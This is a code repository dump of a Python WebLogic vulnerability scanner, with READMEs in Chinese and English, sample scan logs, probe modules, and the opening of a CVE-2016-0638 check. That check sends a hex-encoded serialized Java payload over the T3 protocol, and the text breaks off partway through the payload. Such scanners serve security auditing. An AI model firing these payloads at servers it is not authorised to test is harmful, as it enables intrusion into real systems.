├── .gitignore
├── README.md
├── README_EN.md
├── stars
    ├── __init__.py
    ├── console.py
    ├── cve_2014_4210.py
    ├── cve_2016_0638.py
    ├── cve_2016_3510.py
    ├── cve_2017_10271.py
    ├── cve_2017_3248.py
    ├── cve_2017_3506.py
    ├── cve_2018_2628.py
    ├── cve_2018_2893.py
    ├── cve_2018_2894.py
    ├── cve_2018_3191.py
    ├── cve_2018_3245.py
    ├── cve_2018_3252.py
    ├── cve_2019_2618.py
    ├── cve_2019_2725.py
    ├── cve_2019_2729.py
    ├── cve_2019_2888.py
    ├── cve_2019_2890.py
    ├── cve_2020_14750.py
    ├── cve_2020_14882.py
    ├── cve_2020_14883.py
    ├── cve_2020_2551.py
    ├── cve_2020_2555.py
    └── cve_2020_2883.py
├── utils
    ├── __init__.py
    ├── logger.py
    ├── process.py
    └── state.py
└── ws.py


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .history
 11 | .Python
 12 | build/
 13 | develop-eggs/
 14 | dist/
 15 | downloads/
 16 | eggs/
 17 | .eggs/
 18 | lib/
 19 | lib64/
 20 | parts/
 21 | sdist/
 22 | var/
 23 | wheels/
 24 | pip-wheel-metadata/
 25 | share/python-wheels/
 26 | *.egg-info/
 27 | .installed.cfg
 28 | *.egg
 29 | MANIFEST
 30 | 
 31 | # PyInstaller
 32 | #  Usually these files are written by a python script from a template
 33 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 34 | *.manifest
 35 | *.spec
 36 | 
 37 | # Installer logs
 38 | pip-log.txt
 39 | pip-delete-this-directory.txt
 40 | 
 41 | # Unit test / coverage reports
 42 | htmlcov/
 43 | .tox/
 44 | .nox/
 45 | .coverage
 46 | .coverage.*
 47 | .cache
 48 | nosetests.xml
 49 | coverage.xml
 50 | *.cover
 51 | *.py,cover
 52 | .hypothesis/
 53 | .pytest_cache/
 54 | 
 55 | # Translations
 56 | *.mo
 57 | *.pot
 58 | 
 59 | # Django stuff:
 60 | *.log
 61 | local_settings.py
 62 | db.sqlite3
 63 | db.sqlite3-journal
 64 | 
 65 | # Flask stuff:
 66 | instance/
 67 | .webassets-cache
 68 | 
 69 | # Scrapy stuff:
 70 | .scrapy
 71 | 
 72 | # Sphinx documentation
 73 | docs/_build/
 74 | 
 75 | # PyBuilder
 76 | target/
 77 | 
 78 | # Jupyter Notebook
 79 | .ipynb_checkpoints
 80 | 
 81 | # IPython
 82 | profile_default/
 83 | ipython_config.py
 84 | 
 85 | # pyenv
 86 | .python-version
 87 | 
 88 | # pipenv
 89 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
 90 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
 91 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
 92 | #   install all needed dependencies.
 93 | #Pipfile.lock
 94 | 
 95 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
 96 | __pypackages__/
 97 | 
 98 | # Celery stuff
 99 | celerybeat-schedule
100 | celerybeat.pid
101 | 
102 | # SageMath parsed files
103 | *.sage.py
104 | 
105 | # Environments
106 | .env
107 | .venv
108 | env/
109 | venv/
110 | ENV/
111 | env.bak/
112 | venv.bak/
113 | 
114 | # Spyder project settings
115 | .spyderproject
116 | .spyproject
117 | 
118 | # Rope project settings
119 | .ropeproject
120 | 
121 | # mkdocs documentation
122 | /site
123 | 
124 | # mypy
125 | .mypy_cache/
126 | .dmypy.json
127 | dmypy.json
128 | 
129 | # Pyre type checker
130 | .pyre/
131 | 
132 | # temp files
133 | *.json
134 | *.txt
135 | 
136 | # idea
137 | .idea/
138 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | 源工具链接：https://github.com/rabbitmask/WeblogicScan
  2 | 
  3 | # weblogicScaner
  4 | 
  5 | 简体中文 | [English](./README_EN.md)
  6 | 
  7 | 截至 2020 年 11 月 27 日，weblogic 漏洞扫描工具。若存在未记录且已公开 POC 的漏洞，欢迎提交 issue。
  8 | 
  9 | 原作者已经收集得比较完整了，在这里做了部分的 bug 修复，部分脚本 POC 未生效，配置错误等问题。之前查了一下发现部分 POC 无法使用。在这个项目里面对脚本做了一些修改，提高准确率。
 10 | 
 11 | **注意**：部分漏洞由于稳定性原因需要多次测试才可验证
 12 | 
 13 | 目前可检测漏洞编号有（部分非原理检测，需手动验证）：
 14 | 
 15 | + weblogic administrator console
 16 | + CVE-2014-4210
 17 | + CVE-2016-0638
 18 | + CVE-2016-3510
 19 | + CVE-2017-3248
 20 | + CVE-2017-3506
 21 | + CVE-2017-10271
 22 | + CVE-2018-2628
 23 | + CVE-2018-2893
 24 | + CVE-2018-2894
 25 | + CVE-2018-3191
 26 | + CVE-2018-3245
 27 | + CVE-2018-3252
 28 | + CVE-2019-2618
 29 | + CVE-2019-2725
 30 | + CVE-2019-2729
 31 | + CVE-2019-2890
 32 | + CVE-2020-2551
 33 | + CVE-2020-14750
 34 | + CVE-2020-14882
 35 | + CVE-2020-14883
 36 | 
 37 | # 快速开始
 38 | 
 39 | ### 依赖
 40 | 
 41 | + python >= 3.6
 42 | 
 43 | 进入项目目录，使用以下命令安装依赖库
 44 | 
 45 | ```
 46 | $ pip3 install requests
 47 | ```
 48 | 
 49 | ### 使用说明
 50 | 
 51 | ```
 52 | usage: ws.py [-h] -t TARGETS [TARGETS ...] -v VULNERABILITY
 53 |              [VULNERABILITY ...] [-o OUTPUT]
 54 | 
 55 | optional arguments:
 56 |   -h, --help            帮助信息
 57 |   -t TARGETS [TARGETS ...], --targets TARGETS [TARGETS ...]
 58 |                         直接填入目标或文件列表（默认使用端口7001）. 例子：
 59 |                         127.0.0.1:7001
 60 |   -v VULNERABILITY [VULNERABILITY ...], --vulnerability VULNERABILITY [VULNERABILITY ...]
 61 |                         漏洞名称或CVE编号，例子："weblogic administrator console"
 62 |   -o OUTPUT, --output OUTPUT
 63 |                         输出 json 结果的路径。默认不输出结果
 64 |   -s, --ssl             强制使用 https 协议请求
 65 | ```
 66 | 
 67 | # 结果样例
 68 | 
 69 | ```
 70 | (venv) ~/weblogicScanner$ python ws.py -t 192.168.124.129
 71 | [23:03:04][INFO] [*][Weblogic Console][192.168.56.129:7001] Start...
 72 | [23:03:04][INFO] [+][Weblogic Console][192.168.56.129:7001] Found module!
 73 | [23:03:04][INFO] [*][Weblogic Console][192.168.56.129:7001] Please verify manually!
 74 | [23:03:04][INFO] [*][CVE-2014-4210][192.168.56.129:7001] Start...
 75 | [23:03:04][INFO] [-][CVE-2014-4210][192.168.56.129:7001] Not found.
 76 | [23:03:04][INFO] [*][CVE-2016-0638][192.168.56.129:7001] Start...
 77 | [23:03:06][INFO] [-][CVE-2016-0638][192.168.56.129:7001] Not vulnerability.
 78 | [23:03:06][INFO] [*][CVE-2016-3510][192.168.56.129:7001] Start...
 79 | [23:03:08][INFO] [-][CVE-2016-3510][192.168.56.129:7001] Not vulnerability.
 80 | [23:03:08][INFO] [*][CVE-2017-3248][192.168.56.129:7001] Start...
 81 | [23:03:10][INFO] [-][CVE-2017-3248][192.168.56.129:7001] Not vulnerability.
 82 | [23:03:10][INFO] [*][CVE-2017-3506][192.168.56.129:7001] Start...
 83 | [23:03:10][INFO] [-][CVE-2017-3506][192.168.56.129:7001] Not vulnerability.
 84 | [23:03:10][INFO] [*][CVE-2017-10271][192.168.56.129:7001] Start...
 85 | [23:03:10][INFO] [-][CVE-2017-10271][192.168.56.129:7001] Not vulnerability.
 86 | [23:03:10][INFO] [*][CVE-2018-2628][192.168.56.129:7001] Start...
 87 | [23:03:14][INFO] [+][CVE-2018-2628][192.168.56.129:7001] Exists vulnerability!
 88 | [23:03:14][INFO] [*][CVE-2018-2893][192.168.56.129:7001] Start...
 89 | [23:03:18][INFO] [+][CVE-2018-2893][192.168.56.129:7001] Exists vulnerability!
 90 | [23:03:18][INFO] [*][CVE-2018-2894][192.168.56.129:7001] Start...
 91 | [23:03:19][INFO] [+][CVE-2018-2894][192.168.56.129:7001] Found module!
 92 | [23:03:19][INFO] [*][CVE-2018-2894][192.168.56.129:7001] Please verify manually!
 93 | [23:03:19][INFO] [*][CVE-2018-3191][192.168.56.129:7001] Start...
 94 | [23:03:23][INFO] [+][CVE-2018-3191][192.168.56.129:7001] Exists vulnerability!
 95 | [23:03:23][INFO] [*][CVE-2018-3245][192.168.56.129:7001] Start...
 96 | [23:03:29][INFO] [-][CVE-2018-3245][192.168.56.129:7001] Not vulnerability.
 97 | [23:03:29][INFO] [*][CVE-2018-3252][192.168.56.129:7001] Start...
 98 | [23:03:36][INFO] [+][CVE-2018-3252][192.168.56.129:7001] Found module!
 99 | [23:03:36][INFO] [*][CVE-2018-3252][192.168.56.129:7001] Please verify manually!
100 | [23:03:36][INFO] [*][CVE-2019-2618][192.168.56.129:7001] Start...
101 | [23:03:36][INFO] [+][CVE-2019-2618][192.168.56.129:7001] Found module!
102 | [23:03:36][INFO] [*][CVE-2019-2618][192.168.56.129:7001] Please verify manually!
103 | [23:03:36][INFO] [*][CVE-2019-2725][192.168.56.129:7001] Start...
104 | [23:03:46][INFO] [-][CVE-2019-2725][192.168.56.129:7001] Not vulnerability.
105 | [23:03:46][INFO] [*][CVE-2019-2729][192.168.56.129:7001] Start...
106 | [23:03:54][INFO] [-][CVE-2019-2729][192.168.56.129:7001] Not vulnerability.
107 | [23:03:54][INFO] [*][CVE-2019-2888][192.168.56.129:7001] Start...
108 | [23:03:56][INFO] [+][CVE-2019-2888][192.168.56.129:7001] Found module!
109 | [23:03:56][INFO] [*][CVE-2019-2888][192.168.56.129:7001] Please verify manually!
110 | [23:03:56][INFO] [*][CVE-2019-2890][192.168.56.129:7001] Start...
111 | [23:03:58][INFO] [-][CVE-2019-2890][192.168.56.129:7001] Not vulnerability.
112 | [23:03:58][INFO] [*][CVE-2020-2551][192.168.56.129:7001] Start...
113 | [23:03:58][INFO] [+][CVE-2020-2551][192.168.56.129:7001] Found module!
114 | [23:03:58][INFO] [*][CVE-2020-2551][192.168.56.129:7001] Please verify manually!
115 | [23:03:58][INFO] [*][CVE-2020-2555][192.168.56.129:7001] Start...
116 | [23:04:02][INFO] [+][CVE-2020-2555][192.168.56.129:7001] Exists vulnerability!
117 | [23:04:02][INFO] [*][CVE-2020-2883][192.168.56.129:7001] Start...
118 | [23:04:06][INFO] [+][CVE-2020-2883][192.168.56.129:7001] Exists vulnerability!
119 | [23:04:06][INFO] [*][CVE-2020-14882][192.168.56.129:7001] Start...
120 | [23:04:23][INFO] [-][CVE-2020-14882][192.168.56.129:7001] Not vulnerability.
121 | [23:04:23][INFO] [*][CVE-2020-14883][192.168.56.129:7001] Start...
122 | [23:04:23][INFO] [+][CVE-2020-14883][192.168.56.129:7001] Exists vulnerability!
123 | ```


--------------------------------------------------------------------------------
/README_EN.md:
--------------------------------------------------------------------------------
  1 | source: https://github.com/rabbitmask/WeblogicScan
  2 | 
  3 | # weblogicScaner
  4 | 
  5 | [简体中文](./README.md) | English
  6 | 
  7 | As of November 27, 2020, weblogic Vulnerability Scanning Tool. If there is an unrecorded and open POC vulnerability, please submit issue.
  8 | 
  9 | Some bug fixes were made, some POC did not take effect, or configuration errors. I checked before and found that some POC could not be used. In this project, some modifications have been made to the script to improve the accuracy.
 10 | 
 11 | **Note**：Some vulnerabilities require multiple tests to verify due to stability reasons.
 12 | 
 13 | Currently detectable vulnerabilitys are (some non-principles detection, manual verification required):
 14 | 
 15 | + weblogic administrator console
 16 | + CVE-2014-4210
 17 | + CVE-2016-0638
 18 | + CVE-2016-3510
 19 | + CVE-2017-3248
 20 | + CVE-2017-3506
 21 | + CVE-2017-10271
 22 | + CVE-2018-2628
 23 | + CVE-2018-2893
 24 | + CVE-2018-2894
 25 | + CVE-2018-3191
 26 | + CVE-2018-3245
 27 | + CVE-2018-3252
 28 | + CVE-2019-2618
 29 | + CVE-2019-2725
 30 | + CVE-2019-2729
 31 | + CVE-2019-2890
 32 | + CVE-2020-2551
 33 | + CVE-2020-14750
 34 | + CVE-2020-14882
 35 | + CVE-2020-14883
 36 | 
 37 | # Quick start
 38 | 
 39 | ### Required
 40 | 
 41 | + python >= 3.6
 42 | 
 43 | In the project directory and use the following command to install the dependent libraries
 44 | 
 45 | ```
 46 | $ pip3 install requests
 47 | ```
 48 | 
 49 | ### Usage
 50 | 
 51 | ```
 52 | usage: ws.py [-h] -t TARGETS [TARGETS ...]
 53 |              [-v VULNERABILITY [VULNERABILITY ...]] [-o OUTPUT]
 54 | 
 55 | optional arguments:
 56 |   -h, --help            show this help message and exit
 57 |   -t TARGETS [TARGETS ...], --targets TARGETS [TARGETS ...]
 58 |                         target, or targets file(default port 7001). eg.
 59 |                         127.0.0.1:7001
 60 |   -v VULNERABILITY [VULNERABILITY ...], --vulnerability VULNERABILITY [VULNERABILITY ...]
 61 |                         vulnerability name. eg. "weblogic administrator
 62 |                         console"
 63 |   -o OUTPUT, --output OUTPUT
 64 |                         Path to json output(default without output).
 65 |   -s, --ssl             Forcing the use of the https protocol.
 66 | ```
 67 | 
 68 | # Example
 69 | 
 70 | ```
 71 | (venv) ~/weblogicScanner$ python ws.py -t 192.168.124.129
 72 | [23:03:04][INFO] [*][Weblogic Console][192.168.56.129:7001] Start...
 73 | [23:03:04][INFO] [+][Weblogic Console][192.168.56.129:7001] Found module!
 74 | [23:03:04][INFO] [*][Weblogic Console][192.168.56.129:7001] Please verify manually!
 75 | [23:03:04][INFO] [*][CVE-2014-4210][192.168.56.129:7001] Start...
 76 | [23:03:04][INFO] [-][CVE-2014-4210][192.168.56.129:7001] Not found.
 77 | [23:03:04][INFO] [*][CVE-2016-0638][192.168.56.129:7001] Start...
 78 | [23:03:06][INFO] [-][CVE-2016-0638][192.168.56.129:7001] Not vulnerability.
 79 | [23:03:06][INFO] [*][CVE-2016-3510][192.168.56.129:7001] Start...
 80 | [23:03:08][INFO] [-][CVE-2016-3510][192.168.56.129:7001] Not vulnerability.
 81 | [23:03:08][INFO] [*][CVE-2017-3248][192.168.56.129:7001] Start...
 82 | [23:03:10][INFO] [-][CVE-2017-3248][192.168.56.129:7001] Not vulnerability.
 83 | [23:03:10][INFO] [*][CVE-2017-3506][192.168.56.129:7001] Start...
 84 | [23:03:10][INFO] [-][CVE-2017-3506][192.168.56.129:7001] Not vulnerability.
 85 | [23:03:10][INFO] [*][CVE-2017-10271][192.168.56.129:7001] Start...
 86 | [23:03:10][INFO] [-][CVE-2017-10271][192.168.56.129:7001] Not vulnerability.
 87 | [23:03:10][INFO] [*][CVE-2018-2628][192.168.56.129:7001] Start...
 88 | [23:03:14][INFO] [+][CVE-2018-2628][192.168.56.129:7001] Exists vulnerability!
 89 | [23:03:14][INFO] [*][CVE-2018-2893][192.168.56.129:7001] Start...
 90 | [23:03:18][INFO] [+][CVE-2018-2893][192.168.56.129:7001] Exists vulnerability!
 91 | [23:03:18][INFO] [*][CVE-2018-2894][192.168.56.129:7001] Start...
 92 | [23:03:19][INFO] [+][CVE-2018-2894][192.168.56.129:7001] Found module!
 93 | [23:03:19][INFO] [*][CVE-2018-2894][192.168.56.129:7001] Please verify manually!
 94 | [23:03:19][INFO] [*][CVE-2018-3191][192.168.56.129:7001] Start...
 95 | [23:03:23][INFO] [+][CVE-2018-3191][192.168.56.129:7001] Exists vulnerability!
 96 | [23:03:23][INFO] [*][CVE-2018-3245][192.168.56.129:7001] Start...
 97 | [23:03:29][INFO] [-][CVE-2018-3245][192.168.56.129:7001] Not vulnerability.
 98 | [23:03:29][INFO] [*][CVE-2018-3252][192.168.56.129:7001] Start...
 99 | [23:03:36][INFO] [+][CVE-2018-3252][192.168.56.129:7001] Found module!
100 | [23:03:36][INFO] [*][CVE-2018-3252][192.168.56.129:7001] Please verify manually!
101 | [23:03:36][INFO] [*][CVE-2019-2618][192.168.56.129:7001] Start...
102 | [23:03:36][INFO] [+][CVE-2019-2618][192.168.56.129:7001] Found module!
103 | [23:03:36][INFO] [*][CVE-2019-2618][192.168.56.129:7001] Please verify manually!
104 | [23:03:36][INFO] [*][CVE-2019-2725][192.168.56.129:7001] Start...
105 | [23:03:46][INFO] [-][CVE-2019-2725][192.168.56.129:7001] Not vulnerability.
106 | [23:03:46][INFO] [*][CVE-2019-2729][192.168.56.129:7001] Start...
107 | [23:03:54][INFO] [-][CVE-2019-2729][192.168.56.129:7001] Not vulnerability.
108 | [23:03:54][INFO] [*][CVE-2019-2888][192.168.56.129:7001] Start...
109 | [23:03:56][INFO] [+][CVE-2019-2888][192.168.56.129:7001] Found module!
110 | [23:03:56][INFO] [*][CVE-2019-2888][192.168.56.129:7001] Please verify manually!
111 | [23:03:56][INFO] [*][CVE-2019-2890][192.168.56.129:7001] Start...
112 | [23:03:58][INFO] [-][CVE-2019-2890][192.168.56.129:7001] Not vulnerability.
113 | [23:03:58][INFO] [*][CVE-2020-2551][192.168.56.129:7001] Start...
114 | [23:03:58][INFO] [+][CVE-2020-2551][192.168.56.129:7001] Found module!
115 | [23:03:58][INFO] [*][CVE-2020-2551][192.168.56.129:7001] Please verify manually!
116 | [23:03:58][INFO] [*][CVE-2020-2555][192.168.56.129:7001] Start...
117 | [23:04:02][INFO] [+][CVE-2020-2555][192.168.56.129:7001] Exists vulnerability!
118 | [23:04:02][INFO] [*][CVE-2020-2883][192.168.56.129:7001] Start...
119 | [23:04:06][INFO] [+][CVE-2020-2883][192.168.56.129:7001] Exists vulnerability!
120 | [23:04:06][INFO] [*][CVE-2020-14882][192.168.56.129:7001] Start...
121 | [23:04:23][INFO] [-][CVE-2020-14882][192.168.56.129:7001] Not vulnerability.
122 | [23:04:23][INFO] [*][CVE-2020-14883][192.168.56.129:7001] Start...
123 | [23:04:23][INFO] [+][CVE-2020-14883][192.168.56.129:7001] Exists vulnerability!
124 | ```


--------------------------------------------------------------------------------
/stars/__init__.py:
--------------------------------------------------------------------------------
  1 | import logging
  2 | import traceback
  3 | from multiprocessing.managers import SyncManager
  4 | from typing import Any, Dict, List, Mapping, Tuple, Union
  5 | 
  6 | from utils.state import BaseState
  7 | from utils import http
  8 | from utils.logger import APPNAME
  9 | 
 10 | logger = logging.getLogger(APPNAME)
 11 | 
 12 | 
 13 | class MessageSign(BaseState):
 14 |     EXC = '[!]'
 15 |     STR = '[*]'
 16 |     PLS = '[+]'
 17 |     MIN = '[-]'
 18 | 
 19 | 
 20 | class TargetType(BaseState):
 21 |     VULNERABILITY = 40
 22 |     MODULE = 20
 23 | 
 24 | 
 25 | class ResultCode(BaseState):
 26 |     # start checking
 27 |     START = 10
 28 |     # exists vulnerability
 29 |     EXISTS = 20
 30 |     # not exists anything
 31 |     NOTEXISTS = 40
 32 |     # timeout
 33 |     TIMEOUT = 50
 34 |     # error
 35 |     ERROR = 60
 36 |     # detect finish
 37 |     FINISH = 100
 38 | 
 39 | 
 40 | msg_sign = MessageSign()
 41 | result_code = ResultCode()
 42 | target_type = TargetType()
 43 | 
 44 | 
 45 | class Star:
 46 |     info = {
 47 |         'NAME': '',
 48 |         'CVE': '',
 49 |         'TAG': []
 50 |     }
 51 | 
 52 |     type: target_type.VULNERABILITY
 53 | 
 54 |     def __init__(self):
 55 |         rc = result_code.to_dict()
 56 |         self.msg_group: Dict[str, List[str]] = {}
 57 |         for key in rc:
 58 |             code = rc[key]
 59 |             self.msg_group[code] = []
 60 |             if code == result_code.START:
 61 |                 self.msg_group[code].append('[*][{call}][{target}] Start...')
 62 |             if code == result_code.NOTEXISTS:
 63 |                 if self.type == target_type.VULNERABILITY:
 64 |                     self.msg_group[code].append(
 65 |                         '[-][{call}][{target}] Not vulnerability.')
 66 |                 elif self.type == target_type.MODULE:
 67 |                     self.msg_group[code].append(
 68 |                         '[-][{call}][{target}] Not found.')
 69 |             if code == result_code.EXISTS:
 70 |                 if self.type == target_type.VULNERABILITY:
 71 |                     self.msg_group[code].append(
 72 |                         '[+][{call}][{target}] Exists vulnerability!')
 73 |                 elif self.type == target_type.MODULE:
 74 |                     self.msg_group[code].append(
 75 |                         '[+][{call}][{target}] Found module, Please verify manually!')
 76 |             if code == result_code.TIMEOUT:
 77 |                 self.msg_group[code].append('[!][{call}][{target}] Timeout.')
 78 |             if code == result_code.ERROR:
 79 |                 self.msg_group[code].append(
 80 |                     '[!][{call}][{target}] Connection error.')
 81 | 
 82 |     def light_and_msg(self, dip, dport, force_ssl=None, *arg, **kwargs):
 83 |         # self.print_msg(f'{dip}:{dport}', result_code.START)
 84 |         res = False
 85 |         data = {}
 86 |         try:
 87 |             res, data = self.light_up(dip, dport, force_ssl, *arg, **kwargs)
 88 |         except Exception as e:
 89 |             # ConnectionResetError: 当 socket 连接被重置触发，常见于反序列化的场景
 90 |             # ConnectionAbortedError: 当 socket 连接被强制中断触发，常见于存在防火墙的场景
 91 |             self.print_msg(f'{dip}:{dport}', result_code.ERROR, {
 92 |                 'more_detail': ['''The following information output is only used for error tracking, so don't panic''', '以下信息输出仅为错误追踪使用，请勿担心', traceback.format_exc()]}, level=logging.DEBUG)
 93 |         if res:
 94 |             self.print_msg(f'{dip}:{dport}', result_code.EXISTS)
 95 |         else:
 96 |             self.print_msg(f'{dip}:{dport}', result_code.NOTEXISTS)
 97 | 
 98 |         # result = {
 99 |         #     'APPNAME': APPNAME,
100 |         #     'IP': dip,
101 |         #     'PORT': dport,
102 |         #     'NAME': self.info['CVE'] if self.info['CVE'] else self.info['NAME'],
103 |         #     'MSG': '',
104 |         #     'STATE': False
105 |         # }
106 |         # result['STATE'] = res
107 |         # result['MSG'] = data['msg']
108 |         # queue.put(result)
109 |         return res, data
110 | 
111 |     def light_up(self, dip, dport, force_ssl=None, *arg, **kwargs) -> Tuple[Union[bool, None], dict]:
112 |         self.print_msg(f'{dip}:{dport}', result_code.START)
113 |         return None, {}
114 | 
115 |     def get_info(self, key: str):
116 |         if key in self.info:
117 |             return self.info[key.upper()]
118 | 
119 |     def set_info(self, key: str, value: Any):
120 |         if key.upper() == 'CVE':
121 |             self.info[key.upper()] = value.upper()
122 |         else:
123 |             self.info[key.upper()] = value
124 | 
125 |     def add_msg_group(self, msg, code=result_code.START, sign=msg_sign.STR):
126 |         if code not in self.msg_group:
127 |             return None
128 |         self.msg_group[code] = f'{sign} {msg}'
129 | 
130 |     def print_msg(self, target, code: int = result_code.START, data: Union[Dict[str, Any], None] = None,
131 |                   level: int = logging.INFO):
132 |         if not data:
133 |             data = {}
134 |         data['target'] = target
135 |         data['call'] = self.get_info("CVE") if self.get_info(
136 |             "CVE") else self.get_info("NAME")
137 | 
138 |         for msg in self.msg_group[code]:
139 |             logger.info(msg.format(**data))
140 |         if 'more_detail' in data and isinstance(data['more_detail'], List):
141 |             # The 'more_detail' key type is List
142 |             for detail in data['more_detail']:
143 |                 self.print_ext_msg(detail, level=level)
144 | 
145 |     def print_ext_msg(self, msg, sign=msg_sign.STR, level: int = logging.INFO):
146 |         logger.log(level, f'{sign} {msg}')
147 | 
148 |     def http(self, url, method='GET', *arg, **kwargs):
149 |         return http(url, method, *arg, **kwargs)
150 | 
151 | 
152 | # class Universe:
153 | #     actived: Dict[str, List[Star]] = {}
154 | 
155 | #     def groups(self, gname=''):
156 | #         def decorator(cls: Star):
157 | #             nonlocal gname
158 | #             if not gname:
159 | #                 gname = 'default'
160 | #             if gname not in self.actived:
161 | #                 self.actived[gname] = []
162 | #             # instance = cls
163 | #             # if instance
164 | #             self.actived[gname].append(cls)
165 | 
166 | #         return decorator
167 | 
168 | 
169 | # universe = Universe()
170 | 


--------------------------------------------------------------------------------
/stars/console.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # Weblogic Console
 4 | # updated 2019/10/23
 5 | # by 0xn0ne
 6 | 
 7 | import sys
 8 | from multiprocessing.managers import SyncManager
 9 | from typing import Any, Dict, List, Mapping, Tuple, Union
10 | 
11 | from utils import http
12 | 
13 | from stars import target_type, Star
14 | 
15 | headers = {'User-Agent': 'TestUA/1.0'}
16 | 
17 | 
18 | # @universe.groups()
19 | class WeblogicConsole(Star):
20 |     info = {
21 |         'NAME': 'Weblogic Console',
22 |         'CVE': None,
23 |         'TAG': []
24 |     }
25 |     type = target_type.MODULE
26 | 
27 |     def light_up(self, dip, dport, force_ssl=None, path='console', *args, **kwargs) -> (bool, dict):
28 |         r, data = http(
29 |             'http://{}:{}/{}/login/LoginForm.jsp'.format(dip, dport, path), ssl=force_ssl)
30 |         if r and r.status_code == 200:
31 |             return True, {'url': r.url}
32 |         return False, {}
33 | 
34 | 
35 | def run(queue: SyncManager.Queue, data: Dict):
36 |     obj = WeblogicConsole()
37 |     result = {
38 |         'IP': data['IP'],
39 |         'PORT': data['PORT'],
40 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
41 |         'MSG': '',
42 |         'STATE': False
43 |     }
44 |     result['STATE'], result['MSG'] = obj.light_and_msg(
45 |         data['IP'], data['PORT'], data['IS_SSL'])
46 | 
47 |     queue.put(result)
48 | 


--------------------------------------------------------------------------------
/stars/cve_2014_4210.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2014-4210
 4 | # updated 2019/10/23
 5 | # by 0xn0ne
 6 | 
 7 | import sys
 8 | from multiprocessing.managers import SyncManager
 9 | from typing import Any, Dict, List, Mapping, Tuple, Union
10 | 
11 | from utils import http
12 | 
13 | # 有漏洞的情况
14 | # 端口不存在
15 | # An error has occurred
16 | # weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: 'x.x.x.x', port: '80'
17 | # 端口存在
18 | # An error has occurred
19 | # weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://x.x.x.x:7001 which did not have a valid SOAP content-type: text/html.
20 | from stars import target_type, Star
21 | 
22 | 
23 | # @universe.groups()
24 | class CVE_2014_4210(Star):
25 |     info = {
26 |         'NAME': 'webLogic server server-side-request-forgery',
27 |         'CVE': 'CVE-2014-4210',
28 |         'TAG': []
29 |     }
30 |     type = target_type.MODULE
31 | 
32 |     def light_up(self, dip, dport, force_ssl=None, *args, **kwargs) -> (bool, dict):
33 |         r, data = http(
34 |             'http://{}:{}/uddiexplorer/SearchPublicRegistries.jsp'.format(dip, dport), ssl=force_ssl)
35 |         if r and r.status_code == 200:
36 |             return True, {'url': r.url}
37 |         return False, {}
38 | 
39 | def run(queue: SyncManager.Queue, data: Dict):
40 |     obj = CVE_2014_4210()
41 |     result = {
42 |         'IP': data['IP'],
43 |         'PORT': data['PORT'],
44 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
45 |         'MSG': '',
46 |         'STATE': False
47 |     }
48 |     result['STATE'], result['MSG'] = obj.light_and_msg(
49 |         data['IP'], data['PORT'], data['IS_SSL'])
50 | 
51 |     queue.put(result)
52 | 


--------------------------------------------------------------------------------
/stars/cve_2016_0638.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2016-0638
 4 | # 该漏洞不会直接回显
 5 | # updated 2019/11/1
 6 | # by 0xn0ne
 7 | 
 8 | import socket
 9 | import time
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | from stars import target_type, Star
14 | 
15 | 
16 | # @universe.groups()
17 | class CVE_2016_0638(Star):
18 |     info = {
19 |         'NAME': '',
20 |         'CVE': 'CVE-2016-0638',
21 |         'TAG': []
22 |     }
23 |     type = target_type.VULNERABILITY
24 | 
25 |     def light_up(self, dip, dport, force_ssl=None, delay=1, timeout=5, *args, **kwargs) -> (bool, dict):
26 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
27 |         # t3 handshake
28 |         dport = int(dport)
29 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30 |         sock.settimeout(timeout)
31 |         try:
32 |             sock.connect((dip, dport))
33 |         except socket.timeout:
34 |             return False, {'msg': 'connection timeout.'}
35 |         except ConnectionRefusedError:
36 |             return False, {'msg': 'connection refuse.'}
37 |         sock.send(bytes.fromhex(
38 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
39 |         time.sleep(delay)
40 |         sock.recv(1024)
41 | 
42 |         # build t3 request object
43 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506